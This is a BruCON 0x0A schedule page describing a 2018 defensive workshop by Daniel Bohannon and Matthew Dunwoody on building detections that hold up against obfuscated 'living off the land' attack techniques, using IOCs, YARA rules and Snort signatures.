BruCON 0x0A has ended
Back To Schedule
Thursday, October 4 • 13:30 - 17:30
Developing Resilient Detections (with Obfuscation & Evasion in Mind) FULL

Sign up or log in to save this to your schedule, view media, leave feedback and see who's attending!

Feedback form is now closed.
Limited Capacity full

WARNING: Heavy obfuscation, evasion and general offensive techniques will be demonstrated to challenge and improve attendees’ defensive thinking and detection approaches!

Offensive tradecraft and "living off the land" techniques are discovered, developed and released to the public at breakneck speeds. Attackers begin using these techniques within hours of their release. However, defenders often spend days, weeks or months identifying and reactively creating signatures for these techniques. Often these reactive signatures are overly rigid; therefore, they are easily bypassed by simple modifications to the command or technique.

In this workshop we will:
    * Develop multiple layers of resilient host-based and network-based detections for several relevant "living off the land" attack techniques
    * Introduce incremental layers of obfuscation and evasion techniques to the attacker commands and payloads to iteratively evade and harden our detection approach
    * Learn about numerous host-based artifacts we can use for detection purposes (process arguments, common persistence locations, image load events, prefetch files, Shimcache, Amcache, SRUM - System Resource Usage Monitor, etc.)
    * Implement detection logic in numerous formats including IOCs (Indicators of Compromise), YARA rules, and Snort signatures

The author has several years of real-world experience creating, tuning and enriching real-time detections that run on 10+ million endpoints in 100's of environments around the world. This firsthand experience will help facilitate conversations around false positives, detection performance and signal-to-noise ratios – concepts that are often overlooked (and sometimes less relevant) when dealing only with smaller environments.

avatar for Daniel Bohannon

Daniel Bohannon

 Matthew Dunwoody (@matthewdunwoody) and Daniel Bohannon (@danielhbohannon) are Applied Security Researchers with FireEye’s Advanced Practices Team, where they research attacker activity and developing effective detection signatures and processes (among other things). Matthew previously... Read More →

Thursday October 4, 2018 13:30 - 17:30 CEST
03. Chimay Novotel